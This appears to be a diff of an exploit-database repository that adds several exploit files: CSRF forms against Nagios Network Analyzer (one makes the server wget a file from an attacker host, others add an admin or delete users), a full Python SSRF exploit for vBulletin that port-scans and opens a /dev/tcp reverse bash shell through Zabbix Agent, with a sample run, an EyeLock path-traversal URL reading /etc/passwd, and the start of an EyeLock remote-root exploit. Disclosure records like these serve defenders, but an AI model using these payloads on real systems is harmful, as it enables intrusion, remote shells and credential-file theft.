||||
|
||||
The contents of this advisory are copyright (c) 2016 Core Security and (c) 2016 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
|
||||
|
||||
13. PGP/GPG Keys
|
||||
|
||||
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
|
149
platforms/php/webapps/40221.txt
Executable file
149
platforms/php/webapps/40221.txt
Executable file
|
@ -0,0 +1,149 @@
|
|||
[+] Credits: John Page ( hyp3rlinx )
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/NAGIOS-NA-v2.2.1-MULTIPLE-CSRF.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
www.nagios.com
|
||||
|
||||
|
||||
Product:
|
||||
==============================
|
||||
Nagios Network Analyzer v2.2.1
|
||||
|
||||
Netflow Analysis, Monitoring, and Bandwidth Utilization Software
|
||||
|
||||
Network Analyzer provides an in-depth look at all network traffic sources
|
||||
and potential security threats allowing system
|
||||
admins to quickly gather high-level information regarding the health of the
|
||||
network as well as highly granular data for
|
||||
complete and thorough network analysis.
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
=================================
|
||||
Cross Site Request Forgery (CSRF)
|
||||
|
||||
|
||||
CVE Reference:
|
||||
==============
|
||||
N/A
|
||||
|
||||
|
||||
Vulnerability Details:
|
||||
=====================
|
||||
|
||||
Nagios NA has multiple CSRF vectors, allowing unauthorized commands to be
|
||||
transmitted from a user that the website trusts if that user is
|
||||
authenticated and visits a malicious webpage or clicks a attacker supplied
|
||||
link. The Nagios system can be compromised as remote attackers
|
||||
can create arbitrary commands e.g. using "wget" to download RCE files onto
|
||||
the system, create arbitrary Admins, delete users, and conduct
|
||||
DOS attacks.
|
||||
|
||||
|
||||
Exploit code(s):
|
||||
================
|
||||
|
||||
1) Create arbitrary commands
|
||||
|
||||
<form action="
|
||||
http://victim-server/nagiosna/index.php/api/system/create_command"
|
||||
method="post">
|
||||
<input type="hidden" name="name" value="pwn">
|
||||
<input type="hidden" name="location" value="%2Fusr%2Fbin%2Fwget">
|
||||
<input type="hidden" name="script" value="wget">
|
||||
<input type="hidden" name="args"
|
||||
value="http%3A%2F%2Fattacker-server%2FRCE.php">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
2) Add Admin
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/admin/users/create"
|
||||
method="post" accept-charset="utf-8">
|
||||
<input type="text" name="first_name" value="CSRF">
|
||||
<input type="text" name="last_name" value="ME">
|
||||
<input type="text" name="company" value="PWN">
|
||||
<input type="text" name="email" value="evil@abyss.com">
|
||||
<input type="text" name="phone" value="">
|
||||
<input type="text" name="username" value="HYP3RLINX">
|
||||
<input type="password" name="password" value="abc123">
|
||||
<input type="password" name="password2" value="abc123">
|
||||
<input type="hidden" name="language" value="default" >
|
||||
<input type="hidden" name="account_type" id="account_type" value="local">
|
||||
<input type="hidden" name="ldap_server" id="ldap_server">
|
||||
<input type="hidden" name="ad_server" id="ad_server" value="1">
|
||||
|
||||
<input type="text" name="ad_username" id="ad_username">
|
||||
<input type="text" name="dn" placeholder="cn=John Smith,dn=nagios,dc=com">
|
||||
<input type="radio" name="group" value="1" checked="true" >
|
||||
<input type="radio" name="apiaccess" value="1" >
|
||||
<input type="radio" name="apiaccess" value="0" checked>
|
||||
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
3) Delete reports (report ID must be known or guessed)
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/api/reports/delete"
|
||||
method="post">
|
||||
<input type="hidden" name="q[rid]" value="9">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
4) DOS
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/api/system/stop"
|
||||
method="post">
|
||||
<input type="hidden" name="sid" value="1">
|
||||
<script>//document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
5) Delete users (user ID must be known or guessed)
|
||||
|
||||
<form action="http://victim-server/nagiosna/index.php/admin/users/delete"
|
||||
method="post">
|
||||
<input type="hidden" name="id" value="10">
|
||||
<script>document.forms[0].submit()</script>
|
||||
</form>
|
||||
|
||||
|
||||
Disclosure Timeline:
|
||||
======================================
|
||||
Vendor Notification: July 20, 2016
|
||||
Vendor Acknowledgement: July 21, 2016
|
||||
Vendor Fix / Release: August 1, 2016
|
||||
August 8, 2016 : Public Disclosure
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory,
|
||||
provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in
|
||||
vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the
|
||||
information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author
|
||||
prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere.
|
||||
|
||||
HYP3RLINX
|
524
platforms/php/webapps/40225.py
Executable file
524
platforms/php/webapps/40225.py
Executable file
|
@ -0,0 +1,524 @@
|
|||
'''
|
||||
=============================================
|
||||
- Discovered by: Dawid Golunski
|
||||
- http://legalhackers.com
|
||||
- dawid (at) legalhackers.com
|
||||
|
||||
- CVE-2016-6483
|
||||
- Release date: 05.08.2016
|
||||
- Severity: High
|
||||
=============================================
|
||||
|
||||
|
||||
I. VULNERABILITY
|
||||
-------------------------
|
||||
|
||||
vBulletin <= 5.2.2 Preauth Server Side Request Forgery (SSRF)
|
||||
vBulletin <= 4.2.3
|
||||
vBulletin <= 3.8.9
|
||||
|
||||
|
||||
II. BACKGROUND
|
||||
-------------------------
|
||||
|
||||
vBulletin (vB) is a proprietary Internet forum software package developed by
|
||||
vBulletin Solutions, Inc., a division of Internet Brands.
|
||||
|
||||
https://www.vbulletin.com/
|
||||
https://en.wikipedia.org/wiki/VBulletin
|
||||
|
||||
|
||||
A google search for "Powered by vBulletin" returns over 19 million sites
|
||||
that are hosting a vBulletin forum:
|
||||
|
||||
https://www.google.co.uk/?gws_rd=ssl#q=%22Powered+by+vBulletin%22
|
||||
|
||||
|
||||
III. INTRODUCTION
|
||||
-------------------------
|
||||
|
||||
vBulletin forum software is affected by a SSRF vulnerability that allows
|
||||
unauthenticated remote attackers to access internal services (such as mail
|
||||
servers, memcached, couchDB, zabbix etc.) running on the server hosting
|
||||
vBulletin as well as services on other servers on the local network that are
|
||||
accessible from the target.
|
||||
|
||||
This advisory provides a PoC exploit that demonstrates how an unauthenticated
|
||||
attacker could perform a port scan of the internal services as well as execute
|
||||
arbitrary system commands on a target vBulletin host with a locally installed
|
||||
Zabbix Agent monitoring service.
|
||||
|
||||
IV. DESCRIPTION
|
||||
-------------------------
|
||||
|
||||
vBulletin allows forum users to share media fiels by uploading them to the
|
||||
remote server. Some pages allow users to specify a URL to a media file
|
||||
that a user wants to share which will then be retrieved by vBulletin.
|
||||
The user-provided links are validated to make sure that users can only access
|
||||
resources from HTTP/HTTPS protocols and that connections are not allowed in to
|
||||
the localhost.
|
||||
|
||||
These restrictions can be found in core/vb/vurl/curl.php source file:
|
||||
|
||||
/**
|
||||
* Determine if the url is safe to load
|
||||
*
|
||||
* @param $urlinfo -- The parsed url info from vB_String::parseUrl -- scheme, port, host
|
||||
* @return boolean
|
||||
*/
|
||||
private function validateUrl($urlinfo)
|
||||
{
|
||||
// VBV-11823, only allow http/https schemes
|
||||
if (!isset($urlinfo['scheme']) OR !in_array(strtolower($urlinfo['scheme']), array('http', 'https')))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
// VBV-11823, do not allow localhost and 127.0.0.0/8 range by default
|
||||
if (!isset($urlinfo['host']) OR preg_match('#localhost|127\.(\d)+\.(\d)+\.(\d)+#i', $urlinfo['host']))
|
||||
{
|
||||
return false;
|
||||
}
|
||||
|
||||
if (empty($urlinfo['port']))
|
||||
{
|
||||
if ($urlinfo['scheme'] == 'https')
|
||||
{
|
||||
$urlinfo['port'] = 443;
|
||||
}
|
||||
else
|
||||
{
|
||||
$urlinfo['port'] = 80;
|
||||
}
|
||||
}
|
||||
// VBV-11823, restrict detination ports to 80 and 443 by default
|
||||
// allow the admin to override the allowed ports in config.php (in case they have a proxy server they need to go to).
|
||||
$config = vB::getConfig();
|
||||
[...]
|
||||
|
||||
|
||||
HTTP redirects are also prohibited however there is one place in the vBulletin
|
||||
codebase that accepts redirects from the target server specified in a
|
||||
user-provided link.
|
||||
The code is used to upload media files within a logged-in user's profile and
|
||||
can normally be accessed under a path similar to:
|
||||
|
||||
http://forum/vBulletin522/member/1-mike/media
|
||||
|
||||
By specifying a link to a malicious server that returns a 301 HTTP redirect to
|
||||
the URL of http://localhost:3306 for example, an attacker could easily
|
||||
bypass the restrictions presented above and make a connection to mysql/3306
|
||||
service listening on the localhost.
|
||||
|
||||
This introduces a Server Side Request Forgery (SSRF) vulnerability.
|
||||
|
||||
As curl is used to fetch remote resources, in addition to HTTP, attackers could
|
||||
specify a handful of other protocols to interact with local services.
|
||||
For instance, by sending a redirect to gopher://localhost:11211/datahere
|
||||
attackers could send arbitrary traffic to memcached service on 11211 port.
|
||||
|
||||
Additionally, depending on the temporary directory location configured within
|
||||
the forum, attackers could potentially view the service responses as the
|
||||
download function stores responses within temporary files which could be
|
||||
viewed if the temporary directory is exposed on the web server.
|
||||
|
||||
|
||||
V. PROOF OF CONCEPT EXPLOIT
|
||||
-------------------------
|
||||
|
||||
The exploit code below performs a port scan as well as demonstrates remote
|
||||
command execution via a popular Zabbix Agent monitoring service which might be
|
||||
listening on local port of 10050.
|
||||
The exploit will execute a reverse bash shell on the target if it has the agent
|
||||
installed and permits remote commands.
|
||||
|
||||
The exploit was verified on the following zabbix agent configuration
|
||||
(/etc/zabbix/zabbix_agentd.conf):
|
||||
|
||||
Server=127.0.0.1,::1
|
||||
EnableRemoteCommands=1
|
||||
|
||||
|
||||
------------[ vBulletin_SSRF_exploit.py ]-----------
|
||||
'''
|
||||
|
||||
#!/usr/bin/python
|
||||
|
||||
intro = """
|
||||
vBulletin <= 5.2.2 SSRF PoC Exploit (portscan / zabbix agent RCE)
|
||||
|
||||
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
|
||||
installed on the web server that is hosting the vBulletin forum.
|
||||
|
||||
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
|
||||
gives an option to execute a reverse shell (Remote Commands) that will connect
|
||||
back to the attacker's host on port 8080 by default.
|
||||
|
||||
Coded by:
|
||||
|
||||
Dawid Golunski
|
||||
http://legalhackers.com
|
||||
"""
|
||||
usage = """
|
||||
Usage:
|
||||
The exploit requires that you have an external IP and can start a listener on port 80/443
|
||||
on the attacking machine.
|
||||
|
||||
./vBulletin_SSRF_exploit.py our_external_IP vBulletin_base_url [minimum_port] [maximum_port]
|
||||
|
||||
Example invocation that starts listener on 192.168.1.40 (port 80) and scans local ports 1-85
|
||||
on the remote vBulletin target host:
|
||||
|
||||
./vBulletin_SSRF_exploit.py 192.168.1.40 http://vbulletin-target/forum 1 85
|
||||
|
||||
Before exploiting Zabbix Agent, start your netcat listener on 8080 port in a separate shell e.g:
|
||||
|
||||
nc -vv -l -p 8080
|
||||
|
||||
Disclaimer:
|
||||
For testing purposes only. Do no harm.
|
||||
|
||||
SSL/TLS support needs some tuning. For better results, provide HTTP URL to the vBulletin target.
|
||||
"""
|
||||
|
||||
import web # http://webpy.org/installation
|
||||
import threading
|
||||
import time
|
||||
import urllib
|
||||
import urllib2
|
||||
import socket
|
||||
import ssl
|
||||
import sys
|
||||
|
||||
|
||||
# The listener that will send redirects to the targe
|
||||
class RedirectServer(threading.Thread):
|
||||
def run (self):
|
||||
urls = ('/([0-9a-z_]+)', 'do_local_redir')
|
||||
app = web.application(urls, globals())
|
||||
#app.run()
|
||||
return web.httpserver.runsimple( app.wsgifunc(), ('0.0.0.0', our_port))
|
||||
|
||||
class do_local_redir:
|
||||
def GET(self,whereto):
|
||||
if whereto == "zabbixcmd_redir":
|
||||
# code exec
|
||||
# redirect to gopher://localhost:10050/1system.run[(/bin/bash -c 'nohup bash -i >/dev/tcp/our_ip/shell_port 0<&1 2>&1 &') ; sleep 2s]
|
||||
return web.HTTPError('301', {'Location': 'gopher://localhost:10050/1system.run%5b(%2Fbin%2Fbash%20-c%20%27nohup%20bash%20-i%20%3E%2Fdev%2Ftcp%2F'+our_ext_ip+'%2F'+str(shell_port)+'%200%3C%261%202%3E%261%20%26%27) %20%3B%20sleep%202s%5d' } )
|
||||
else:
|
||||
# internal port connection
|
||||
return web.HTTPError('301', {'Location': "telnet://localhost:%s/" % whereto} )
|
||||
|
||||
def shutdown(code):
|
||||
print "\nJob done. Exiting"
|
||||
if redirector_started == 1:
|
||||
web.httpserver.server.interrupt = KeyboardInterrupt()
|
||||
exit(code)
|
||||
|
||||
|
||||
# [ Default settings ]
|
||||
|
||||
# reverse shell will connect back to port defined below
|
||||
shell_port = 8080
|
||||
# Our HTTP redirector/server port (must be 80 or 443 for vBulletin to accept it)
|
||||
our_port = 443
|
||||
# How long to wait (seconds) before considering a port to be opened.
|
||||
# Don't set it too high to avoid service timeout and an incorrect close state
|
||||
connect_time = 2
|
||||
# Default port scan range is limited to 20-90 to speed up things when testing,
|
||||
# feel free to increase maxport to 65535 here or on the command line if you've
|
||||
# got the time ;)
|
||||
minport = 20
|
||||
maxport = 90
|
||||
# ignore invalid certs (enable if target forum is HTTPS)
|
||||
#ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
|
||||
|
||||
|
||||
# [ Main Meat ]
|
||||
|
||||
print intro
|
||||
redirector_started = 0
|
||||
|
||||
if len(sys.argv) < 3 :
|
||||
print usage
|
||||
sys.exit(2)
|
||||
|
||||
# Set our HTTP Listener/Redirector's external IP
|
||||
our_ext_ip = sys.argv[1]
|
||||
try:
|
||||
socket.inet_aton(our_ext_ip)
|
||||
except socket.error:
|
||||
print "Invalid HTTP redirector server IP [%s]!\n" % our_ext_ip
|
||||
exit(2)
|
||||
|
||||
our_server = "http://%s:%s" % (our_ext_ip, our_port)
|
||||
|
||||
# Target forum base URL (e.g. http://vulnerable-vbulletin/forum)
|
||||
targetforum = sys.argv[2]
|
||||
# Append vulnerable media upload script path to the base URL
|
||||
targeturl = targetforum.strip('/') + "/link/getlinkdata"
|
||||
|
||||
# Change port range (if provided)
|
||||
if (len(sys.argv) == 5) :
|
||||
minport = int(sys.argv[3])
|
||||
# Finish scanning at maxport
|
||||
maxport = int(sys.argv[4])
|
||||
|
||||
|
||||
# Confirm data
|
||||
print "\n* Confirm your settings\n"
|
||||
print "Redirect server to listen on: %s:%s\nTarget vBulletin URL: %s\nScan ports between: %d - %d\n" % (our_ext_ip, our_port, targeturl, minport, maxport)
|
||||
key = raw_input("Are these settings correct? Hit enter to start the port scan... ")
|
||||
|
||||
# Connection check
|
||||
print "\n* Testing connection to vulnerable script at [%s]\n" % targeturl
|
||||
req = urllib2.Request(targeturl, data=' ', headers={ 'User-Agent': 'Mozilla/5.0' } )
|
||||
try:
|
||||
response = urllib2.urlopen(req, timeout=connect_time).read()
|
||||
except urllib2.URLError as e:
|
||||
print "Invalid forum URI / HTTP request failed (reason: %s)\n" % e.reason
|
||||
shutdown(2)
|
||||
|
||||
# Server should return 'invalid_url' string if not url provided in POST
|
||||
if "invalid_url" not in response:
|
||||
print """Invalid target url (%s) or restricted access.\n
|
||||
\nTest with:\n curl -X POST -v %s\nShutting down\n""" % (targeturl, targeturl)
|
||||
sys.exit(2)
|
||||
else:
|
||||
print "Got the right response from the URL. The target looks vulnerable!\n"
|
||||
|
||||
# [ Start the listener and perform a port scan ]
|
||||
print "Let's begin!\n"
|
||||
print "* Starting our redirect base server on %s:%s \n" % (our_ext_ip, our_port)
|
||||
RedirectServer().start()
|
||||
redirector_started = 1
|
||||
|
||||
print "* Scanning local ports from %d to %d on [%s] target \n" % (minport, maxport, targetforum)
|
||||
start = time.time()
|
||||
opened_ports = []
|
||||
maxport+=1
|
||||
|
||||
for targetport in range(minport, maxport):
|
||||
#print "\n\nScanning port %d\n" % (targetport)
|
||||
fetchurl = '%s/%d' % (our_server, targetport)
|
||||
data = urllib.urlencode({'url' : fetchurl})
|
||||
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
|
||||
try:
|
||||
response = urllib2.urlopen(req, timeout=connect_time)
|
||||
except urllib2.URLError, e:
|
||||
print "Oops, url issue? 403 , 404 etc.\n"
|
||||
except socket.timeout, ssl.SSLError:
|
||||
print "Conection opened for %d seconds. Port %d is opened!\n" % (connect_time, targetport)
|
||||
opened_ports.append(targetport)
|
||||
|
||||
elapsed = (time.time() - start)
|
||||
print "\nScanning done in %d seconds. \n\n* Opened ports on the target [%s]: \n" % (elapsed, targetforum)
|
||||
for listening in opened_ports:
|
||||
print "Port %d : Opened\n" % listening
|
||||
print "\nAnything juicy? :)\n"
|
||||
|
||||
if 10050 in opened_ports:
|
||||
print "* Zabbix Agent was found on port 10050 !\n"
|
||||
|
||||
# [ Command execution via Zabbix Agent to gain a reverse shell ]
|
||||
key = raw_input("Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] ")
|
||||
if key != 'y' :
|
||||
shutdown(0)
|
||||
|
||||
print "\n* Executing reverse shell via Zabbix Agent (10050)."
|
||||
fetchurl = '%s/%s' % (our_server, 'zabbixcmd_redir')
|
||||
data = urllib.urlencode({'url' : fetchurl})
|
||||
req = urllib2.Request(targeturl, data=data, headers={ 'User-Agent': 'Mozilla/5.0' } )
|
||||
payload_executed = 0
|
||||
try:
|
||||
response = urllib2.urlopen(req, timeout=connect_time)
|
||||
except urllib2.URLError, e:
|
||||
print "Oops, url issue? 403 , 404 etc.\n"
|
||||
except socket.timeout, ssl.SSLError:
|
||||
# Agent connection remained opened for 2 seconds after the bash payload was sent,
|
||||
# it looks like the sleep 2s shell command must have got executed sucessfuly
|
||||
payload_executed = 1
|
||||
|
||||
if (payload_executed == 1) :
|
||||
print "\nLooks like Zabbix Agent executed our bash payload! Check your netcat listening on port %d for shell! :)\n" % shell_port
|
||||
else:
|
||||
print "\nNo luck. No Zabbix Agent listening on 10050 port or remote commands are disabled :(\n"
|
||||
|
||||
shutdown(0)
|
||||
|
||||
'''
|
||||
----------------------[ eof ]------------------------
|
||||
|
||||
|
||||
Example run:
|
||||
|
||||
root@trusty:~/vbexploit# ./vBulletin_SSRF_exploit.py 192.168.57.10 http://192.168.57.10/vBulletin522new/ 20 85
|
||||
|
||||
vBulletin <= 5.2.2 SSRF PoC Exploit (Localhost Portscan / Zabbix Agent RCE)
|
||||
|
||||
This PoC exploits an SSRF vulnerability in vBulletin to scan internal services
|
||||
installed on the web server that is hosting the vBulletin forum.
|
||||
|
||||
After the scan, the exploit also checks for a Zabbix Agent (10050) port and
|
||||
gives an option to execute a reverse shell (Remote Commands) that will connect
|
||||
back to the attacker's host on port 8080 by default.
|
||||
|
||||
Coded by:
|
||||
|
||||
Dawid Golunski
|
||||
http://legalhackers.com
|
||||
|
||||
|
||||
* Confirm your settings
|
||||
|
||||
Redirect server to listen on: 192.168.57.10:443
|
||||
Target vBulletin URL: http://192.168.57.10/vBulletin522new/link/getlinkdata
|
||||
Scan ports between: 20 - 85
|
||||
|
||||
Are these settings correct? Hit enter to start the port scan...
|
||||
|
||||
* Testing connection to vulnerable script at [http://192.168.57.10/vBulletin522new/link/getlinkdata]
|
||||
|
||||
Got the right response from the URL. The target looks vulnerable!
|
||||
|
||||
Let's begin!
|
||||
|
||||
* Starting our redirect base server on 192.168.57.10:443
|
||||
|
||||
* Scanning local ports from 20 to 85 on [http://192.168.57.10/vBulletin522new/] target
|
||||
|
||||
http://0.0.0.0:443/
|
||||
192.168.57.10:58675 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /20" - 301
|
||||
192.168.57.10:58679 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /21" - 301
|
||||
192.168.57.10:58683 - - [30/Jul/2016 03:00:25] "HTTP/1.1 GET /22" - 301
|
||||
Conection opened for 2 seconds. Port 22 is opened!
|
||||
|
||||
192.168.57.10:58686 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /23" - 301
|
||||
192.168.57.10:58690 - - [30/Jul/2016 03:00:27] "HTTP/1.1 GET /24" - 301
|
||||
192.168.57.10:58694 - - [30/Jul/2016 03:00:28] "HTTP/1.1 GET /25" - 301
|
||||
Conection opened for 2 seconds. Port 25 is opened!
|
||||
|
||||
192.168.57.10:58697 - - [30/Jul/2016 03:00:30] "HTTP/1.1 GET /26" - 301
|
||||
[...]
|
||||
192.168.57.10:58909 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /79" - 301
|
||||
192.168.57.10:58913 - - [30/Jul/2016 03:00:36] "HTTP/1.1 GET /80" - 301
|
||||
Conection opened for 2 seconds. Port 80 is opened!
|
||||
|
||||
192.168.57.10:58917 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /81" - 301
|
||||
192.168.57.10:58921 - - [30/Jul/2016 03:00:38] "HTTP/1.1 GET /82" - 301
|
||||
192.168.57.10:58925 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /83" - 301
|
||||
192.168.57.10:58929 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /84" - 301
|
||||
192.168.57.10:58933 - - [30/Jul/2016 03:00:39] "HTTP/1.1 GET /85" - 301
|
||||
|
||||
Scanning done in 14 seconds.
|
||||
|
||||
* Opened ports on the target [http://192.168.57.10/vBulletin522new/]:
|
||||
|
||||
Port 22 : Opened
|
||||
|
||||
Port 25 : Opened
|
||||
|
||||
Port 80 : Opened
|
||||
|
||||
|
||||
Anything juicy? :)
|
||||
|
||||
Want to execute a reverse shell via the Zabbix Agent? (start netcat before you continue) [y/n] y
|
||||
|
||||
* Executing reverse shell via Zabbix Agent (10050).
|
||||
192.168.57.10:58940 - - [30/Jul/2016 03:00:45] "HTTP/1.1 GET /zabbixcmd_redir" - 301
|
||||
|
||||
Looks like Zabbix Agent executed our bash payload! Check your netcat listening on port 8080 for shell! :)
|
||||
|
||||
|
||||
Job done. Exiting
|
||||
|
||||
|
||||
Here is how the netcat session looks like after a sucessful exploitation:
|
||||
|
||||
$ nc -vvv -l -p 8080
|
||||
Listening on [0.0.0.0] (family 0, port 8080)
|
||||
Connection from [192.168.57.10] port 8080 [tcp/*] accepted (family 2, sport 54259)
|
||||
|
||||
zabbix@trusty:/$ id
|
||||
id
|
||||
uid=122(zabbix) gid=129(zabbix) groups=129(zabbix)
|
||||
zabbix@trusty:/$
|
||||
|
||||
|
||||
|
||||
As we can see reverse shell was executed on the target which sucessfully
|
||||
connected back to the attacker's netcat listener.
|
||||
|
||||
VI. BUSINESS IMPACT
|
||||
-------------------------
|
||||
|
||||
The vulnerability can expose internal services running on the server/within
|
||||
the local network.
|
||||
If not patched, unauthenticated attackers or automated scanners searching for
|
||||
vulnerable servers could send malicious data to internal services.
|
||||
Depending on services in use, the impact could range from sensitive information
|
||||
disclosure, sending spam, DoS/data loss to code execution as demonstrated by
|
||||
the PoC exploit in this advisory.
|
||||
|
||||
|
||||
VII. SYSTEMS AFFECTED
|
||||
-------------------------
|
||||
|
||||
All vBulletin forums in all branches (5.x, 4.x , 3.x) without the latest patches
|
||||
named in the next section are affected by this vulnerability.
|
||||
|
||||
|
||||
VIII. SOLUTION
|
||||
-------------------------
|
||||
|
||||
Upon this advisory, vendor has published the following security releases of
|
||||
vBulletin for each of the affected branches:
|
||||
|
||||
|
||||
vBulletin 5.2.3
|
||||
|
||||
vBulletin 4.2.4 Beta
|
||||
|
||||
vBulletin 3.8.10 Beta
|
||||
|
||||
|
||||
Separate patches have also been released (see references below).
|
||||
|
||||
IX. REFERENCES
|
||||
-------------------------
|
||||
|
||||
http://legalhackers.com
|
||||
|
||||
http://legalhackers.com/advisories/vBulletin-SSRF-Vulnerability-Exploit.txt
|
||||
|
||||
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6483
|
||||
|
||||
vBulletin patches:
|
||||
|
||||
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349551-security-patch-vbulletin-5-2-0-5-2-1-5-2-2
|
||||
|
||||
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349549-security-patch-vbulletin-4-2-2-4-2-3-4-2-4-beta
|
||||
|
||||
http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/4349548-security-patch-vbulletin-3-8-7-3-8-8-3-8-9-3-8-10-beta
|
||||
|
||||
X. CREDITS
|
||||
-------------------------
|
||||
|
||||
The vulnerability has been discovered by Dawid Golunski
|
||||
|
||||
dawid (at) legalhackers (dot) com
|
||||
http://legalhackers.com
|
||||
|
||||
XI. REVISION HISTORY
|
||||
-------------------------
|
||||
|
||||
05.08.2016 - final advisory released
|
||||
|
||||
XII. LEGAL NOTICES
|
||||
-------------------------
|
||||
|
||||
The information contained within this advisory is supplied "as-is" with
|
||||
no warranties or guarantees of fitness of use or otherwise. I accept no
|
||||
responsibility for any damage caused by the use or misuse of this information.
|
||||
'''
|
55
platforms/php/webapps/40227.txt
Executable file
55
platforms/php/webapps/40227.txt
Executable file
|
@ -0,0 +1,55 @@
|
|||
EyeLock nano NXT 3.5 Local File Disclosure Vulnerability
|
||||
|
||||
|
||||
Vendor: EyeLock, LLC
|
||||
Product web page: http://www.eyelock.com
|
||||
Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
|
||||
NXT Firmware: 3.04.1108 (ICM: 3.4.13)
|
||||
NXT Firmware: 3.03.944 (ICM: 3.3.2)
|
||||
NXT Firmware: 3.01.646 (ICM: 3.1.13)
|
||||
|
||||
Platform: Hardware (Biometric Iris Reader (master))
|
||||
|
||||
Summary: Nano NXT is the most advanced compact iris-based identity authentication device
|
||||
in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
|
||||
Nano NXT is a miniaturized iris-based recognition system capable of providing
|
||||
real-time identification, both in-motion and at a distance. The Nano NXT is an
|
||||
ideal replacement for card-based systems, and seamlessly controls access to turnstiles,
|
||||
secured entrances, server rooms and any other physical space. Similarly the device
|
||||
is powerful and compact enough to secure high-value transactions, critical databases,
|
||||
network workstations or any other information system.
|
||||
|
||||
Desc: nano NXT suffers from a file disclosure vulnerability when input passed thru the
|
||||
'path' parameter to 'logdownload.php' script is not properly verified before being used
|
||||
to read files. This can be exploited to disclose contents of files from local resources.
|
||||
|
||||
==================================================================================
|
||||
/scripts/logdownload.php:
|
||||
-------------------------
|
||||
1: <?php
|
||||
2: header("Content-Type: application/octet-stream");
|
||||
3: header("Content-Disposition: attachment; filename={$_GET['dlfilename']}");
|
||||
4: readfile($_GET['path']);
|
||||
5: ?>
|
||||
==================================================================================
|
||||
|
||||
Tested on: GNU/Linux (armv7l)
|
||||
lighttpd/1.4.35
|
||||
SQLite/3.8.7.2
|
||||
PHP/5.6.6
|
||||
|
||||
|
||||
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5356
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5356.php
|
||||
|
||||
|
||||
10.06.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
http://192.168.40.1/scripts/logdownload.php?dlfilename=juicyinfo.txt&path=../../../../../../../../etc/passwd
|
179
platforms/php/webapps/40228.py
Executable file
179
platforms/php/webapps/40228.py
Executable file
|
@ -0,0 +1,179 @@
|
|||
#!/usr/bin/env python
|
||||
#
|
||||
#
|
||||
# EyeLock nano NXT 3.5 Remote Root Exploit
|
||||
#
|
||||
#
|
||||
# Vendor: EyeLock, LLC
|
||||
# Product web page: http://www.eyelock.com
|
||||
# Affected version: NXT Firmware: 3.05.1193 (ICM: 3.5.1)
|
||||
# NXT Firmware: 3.04.1108 (ICM: 3.4.13)
|
||||
# NXT Firmware: 3.03.944 (ICM: 3.3.2)
|
||||
# NXT Firmware: 3.01.646 (ICM: 3.1.13)
|
||||
#
|
||||
# Platform: Hardware (Biometric Iris Reader (master))
|
||||
#
|
||||
# EyeLock is an advanced iris authentication and recognition solutions company
|
||||
# focused on developing next-generation systems for global access control and identity
|
||||
# management.
|
||||
#
|
||||
# Summary: nano NXT® - the next generation of EyeLock’s revolutionary access
|
||||
# control solutions. nano NXT renders all other access control peripherals
|
||||
# obsolete by revolutionizing how identities are protected, authenticated,
|
||||
# and managed. With a sleek low profile and powerful capabilities, the nano
|
||||
# NXT redefines the future of access control. An optional SDK is available
|
||||
# to customers who want to customize their security solutions to integrate
|
||||
# seamlessly with existing applications. The nano NXT authenticates up to 20
|
||||
# people per minute, in-motion and at-a-distance with unparalleled accuracy.
|
||||
# nano NXT can be used in a variety of environments including commercial/enterprise,
|
||||
# corrections, data centers, education, financial services, government, healthcare
|
||||
# facilities and hospitality.
|
||||
#
|
||||
# Nano NXT is the most advanced compact iris-based identity authentication device
|
||||
# in Eyelock's comprehensive suite of end-to-end identity authentication solutions.
|
||||
# Nano NXT is a miniaturized iris-based recognition system capable of providing
|
||||
# real-time identification, both in-motion and at a distance. The Nano NXT is an
|
||||
